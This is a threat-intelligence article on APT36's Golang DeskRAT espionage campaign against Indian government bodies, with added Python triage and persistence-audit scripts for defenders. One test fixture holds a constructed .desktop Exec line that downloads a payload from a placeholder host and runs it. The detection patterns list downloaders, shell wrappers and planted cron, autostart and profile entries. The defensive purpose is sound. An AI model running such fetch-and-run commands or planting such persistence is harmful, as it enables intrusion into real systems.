APT36 Targets Indian Government with New Golang ‘DeskRAT’ Malware Campaign

A Pakistan-linked hacking group APT36 (Transparent Tribe) is spear-phishing Indian government agencies with a new Golang-based “DeskRAT” malware.

Introduction

APT36 – also known as Transparent Tribe – has launched a fresh cyber espionage offensive against Indian government organizations. This Pakistan-linked threat actor, active since at least 2013, is delivering a new Golang-based Remote Access Trojan (RAT) dubbed “DeskRAT” via spear-phishing emails. The campaign was first observed in August–September 2025 and builds on prior attacks from earlier in the year. Using crafty phishing lures and custom malware, APT36’s latest operation highlights the evolving tactics of state-sponsored hackers and carries lessons for security teams worldwide.

APT36 Unleashes Golang DeskRAT on Indian Government

The attack starts with a phishing email that carries either a malicious zip archive or a link to one hosted on a legitimate cloud service such as Google Drive. The archive contains a “.desktop” launcher file whose Exec entry holds the malicious commands. When the .desktop file is executed, it opens a legitimate decoy document, a PDF titled “CDS_Directive_Armed_Forces.pdf,” while in the background it fetches and runs the DeskRAT malware from a look-alike domain, “modgovindia[.]com”. The genuine-looking document serves as bait for the malware.
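One way a defender can triage .desktop attachments for the lure pattern described above (a launcher named like a document whose Exec line spawns a shell, opens a decoy and fetches something). This is an added example, not code from the original article or from any vendor report; the two .desktop samples are constructed fixtures and the domain in them is a placeholder.

```python
import re
from configparser import ConfigParser
from io import StringIO

# Constructed sample modelled on the lure described in the article: a launcher
# posing as a PDF that opens a decoy and fetches a payload from a placeholder
# domain in the background. Not a real sample from the campaign.
SAMPLE_DESKTOP = """[Desktop Entry]
Type=Application
Name=CDS_Directive_Armed_Forces.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "xdg-open CDS_Directive_Armed_Forces.pdf & curl -fsSL https://placeholder.invalid/u -o /tmp/.cache && sh /tmp/.cache"
"""

# Constructed benign launcher for comparison.
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Icon=gedit
"""

# Heuristics: a launcher that looks like a document but wraps a shell,
# downloads something, or runs from a temp/hidden path deserves a closer look.
DOC_NAME = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)$", re.I)
INDICATORS = {
    "shell_wrapper": re.compile(r"\b(ba|z|da)?sh\s+-c\b"),
    "downloader": re.compile(r"\b(curl|wget)\b"),
    "temp_or_hidden_path": re.compile(r"(/tmp/|/dev/shm/|/var/tmp/|/\.[A-Za-z0-9_-]+)"),
    "decoy_open": re.compile(r"\bxdg-open\b"),
    "encoded_blob": re.compile(r"base64\s+(-d|--decode)"),
}

def parse_desktop(text):
    """Return the [Desktop Entry] section as a dict; keys stay case-sensitive as in the spec."""
    cp = ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str
    cp.read_file(StringIO(text))
    return dict(cp["Desktop Entry"])

def triage_desktop(text):
    """Return the names of the indicators that fire for one .desktop file."""
    entry = parse_desktop(text)
    exec_line = entry.get("Exec", "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(exec_line)]
    # A document-looking Name combined with a shell wrapper is the core of this lure.
    if DOC_NAME.search(entry.get("Name", "")) and "shell_wrapper" in hits:
        hits.append("document_masquerade")
    return hits
```

Run it over every .desktop file extracted from a mail attachment; an empty list means none of the heuristics matched, not that the file is safe.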

DeskRAT is built for BOSS (Bharat Operating System Solutions) Linux. Once executed, it opens a covert command-and-control (C2) channel over WebSocket. It then establishes persistence in several ways at once: creating a system service, adding cron jobs, dropping an entry into the autostart directory, and modifying shell profiles. This layered persistence makes the malware hard to remove, since it restarts itself after every reboot as long as any one mechanism survives.
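The four persistence locations named above (systemd units, cron, XDG autostart, shell profiles) can be swept in one pass. The audit below is an added example, not code from the article or from any vendor; it builds a constructed mini-filesystem under a temporary directory so it runs offline, and the hidden paths in the fixture are made up.

```python
import re
import tempfile
from pathlib import Path

# Locations, relative to a root, that DeskRAT-style persistence touches.
PERSISTENCE_GLOBS = {
    "systemd": ["etc/systemd/system/*.service", "home/*/.config/systemd/user/*.service"],
    "cron": ["etc/cron.d/*", "etc/crontab", "var/spool/cron/crontabs/*"],
    "autostart": ["etc/xdg/autostart/*.desktop", "home/*/.config/autostart/*.desktop"],
    "shell_profile": ["home/*/.bashrc", "home/*/.profile", "home/*/.zshrc", "etc/profile.d/*.sh"],
}

# Lines worth a second look: execution from temp dirs or a hidden file,
# downloaders, backgrounding, or @reboot cron entries.
SUSPICIOUS = re.compile(
    r"(/tmp/|/dev/shm/|/var/tmp/|/\.[A-Za-z0-9_-]+(\s|$)|\bcurl\b|\bwget\b|\bnohup\b|@reboot)"
)

def audit_persistence(root):
    """Return [(category, relative_path, offending_line), ...] found under root."""
    root = Path(root)
    findings = []
    for category, patterns in PERSISTENCE_GLOBS.items():
        for pattern in patterns:
            for path in sorted(root.glob(pattern)):
                if not path.is_file():
                    continue
                for line in path.read_text(errors="replace").splitlines():
                    if SUSPICIOUS.search(line) and not line.lstrip().startswith("#"):
                        findings.append((category, str(path.relative_to(root)), line.strip()))
    return findings

def build_fixture():
    """Constructed mini-filesystem: one benign cron entry plus one planted entry per mechanism."""
    root = Path(tempfile.mkdtemp())
    files = {
        "etc/systemd/system/cups-lite.service": "[Service]\nExecStart=/home/user/.cache/.sysd\nRestart=always\n",
        "etc/cron.d/logrotate": "0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf\n",
        "var/spool/cron/crontabs/user": "@reboot /tmp/.x\n",
        "home/user/.config/autostart/update.desktop": "[Desktop Entry]\nExec=/home/user/.fonts/.upd\n",
        "home/user/.bashrc": "alias ll='ls -l'\nnohup /dev/shm/.s >/dev/null 2>&1 &\n",
    }
    for rel, body in files.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(body)
    return root
```

On a live host, call `audit_persistence("/")` instead of the fixture; every hit should be explained by a known package or administrator change before being dismissed.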

DeskRAT’s capabilities reflect an emphasis on intelligence gathering and lateral movement. As security researchers note, “The RAT scans directories and retrieves files of interest (< 100MB with specific extensions), exporting them to its C2 server.” The malware can “traverse files on the host system by performing various commands including data gathering and unleashing additional malware payloads such as Python files, shell files, or desktop files.” Its “ping/heartbeat commands” let the operators confirm that an infected host is still alive and reachable.

All of this happens out of the victim’s sight, as they open what appears to be an ordinary PDF. Earlier this year the group relied on links from trusted cloud drives to deliver its malware; in the current attacks it has moved to attacker-controlled hosting such as the ‘modgovindia’ domain. This increased investment in infrastructure makes the attacks harder to counter.

Cross-Platform Ambitions: Windows and Linux Under Fire

While the DeskRAT malware targets Linux systems, APT36’s ambitions are notably cross-platform. Security researchers at QiAnXin XLab uncovered that the same campaign was also extended to Windows devices via a Golang-based backdoor the researchers call “StealthServer”. The phishing approach was similar – booby-trapped desktop shortcut files sent via email – but the payload for Windows is tailored to that environment.

Over the summer of 2025, at least three variants of the StealthServer malware were observed, evolving rapidly to evade detection. Early versions employed anti-analysis tricks, used traditional TCP channels for C2, and modified the Windows Task Scheduler, Startup folders, and the registry for persistence. Later versions added new anti-debugging checks and eventually adopted WebSocket communication, the same method used by DeskRAT, indicating a unification of tactics across operating systems.

Intriguingly, researchers also found two Linux variants related to StealthServer: one essentially DeskRAT (with an extra command called “welcome”), the other communicating over HTTP instead of WebSockets. The HTTP-based variant could recursively crawl the entire filesystem (starting at the root “/”) to find and exfiltrate files, uploading them in encrypted form to a remote server.

This broader Linux tool, likely an earlier iteration of DeskRAT, shows how APT36 has been refining its malware, moving from a crude all-encompassing data sweeper to a more controlled tool with specific exfiltration commands in DeskRAT. The group’s rapid development cycle and the multitude of malware versions underscore a high level of sophistication and “a high delivery cadence” in its operations. In short, APT36 is actively updating its malware arsenal to target both Linux and Windows environments, aiming to maximize reach within target organizations.

Broader Implications for Global Cybersecurity

APT36’s latest campaign is not an isolated incident – it comes amid a surge of cyber espionage activity across South and East Asia, much of which has global ramifications. Multiple advanced threat actors in the region have been active in recent weeks, targeting government and industry in various countries. For example, recent campaigns include:

  • Bitter APT (APT-Q-37) – Suspected to operate with South Asian interests, Bitter APT has been phishing government, power, and military sectors in China and Pakistan. They use malicious Excel spreadsheets or compressed files exploiting a known vulnerability (CVE-2025-8088) to drop a custom C# malware implant. In some cases, they even distributed malicious ClickOnce applications via email to deploy backdoors that periodically beacon out device information. These tactics illustrate how adversaries leverage software flaws and social engineering to penetrate high-value targets.
  • SideWinder – Another prolific group, SideWinder, launched an “Operation SouthNet” campaign targeting the maritime industry and other sectors in Pakistan, Sri Lanka, Bangladesh, Nepal, and Myanmar. Using credential-harvesting web portals and weaponized lure documents, SideWinder’s attacks deliver multi-platform malware to victims as part of a concentrated regional espionage effort. The wide geographic spread of victims in this operation shows a broadening scope of attacks that can impact international supply chains (like shipping) and national security across borders.
  • OceanLotus (APT-Q-31) – A Vietnam-aligned hacking group, OceanLotus has been observed delivering the powerful Havoc post-exploitation framework in targeted attacks. Their campaign aimed at government departments and enterprises in China and neighboring Southeast Asian countries, demonstrating that countries beyond South Asia are also grappling with sophisticated espionage threats. Tools like Havoc enable attackers to maintain long-term stealthy access in victim networks, emphasizing that the challenge of APT intrusions is truly pan-Asian (and by extension, global) in nature.
  • Mysterious Elephant (APT-K-47) – Active in early 2025, this group executed a multi-pronged attack campaign against government and foreign affairs organizations in Pakistan, Afghanistan, Bangladesh, Nepal, India, and Sri Lanka. Their methodology combined exploit kits, phishing emails, and malicious documents to establish footholds. Notably, they deployed custom malware like BabShell (a C++ reverse shell) and in-memory loaders (e.g., Remcos RAT via “MemLoader”) to carry out espionage. Mysterious Elephant’s use of both bespoke and open-source tools reflects a trend of APT groups developing their own arsenals to avoid relying solely on publicly known malware. Kaspersky analysts describe this group as “highly sophisticated and active”, underlining the significant threat they pose in the Asia-Pacific region.

Common among these intrusions – including APT36’s DeskRAT campaign – is an objective to steal sensitive information. Attackers not only hunt for official documents, but also attempt to siphon off communications and credentials. For instance, some of the above operations specifically aimed to exfiltrate WhatsApp chat data and attachments from compromised PCs. Specialized modules (aptly named “Exfiltrators”) were used to capture files exchanged via the popular messaging platform, as well as to pilfer browsing data like cookies and authentication tokens from web browsers. These real-world examples show the breadth of data modern threat actors seek – from confidential government memos to personal messaging logs – all of which can be leveraged for intelligence or further attacks.
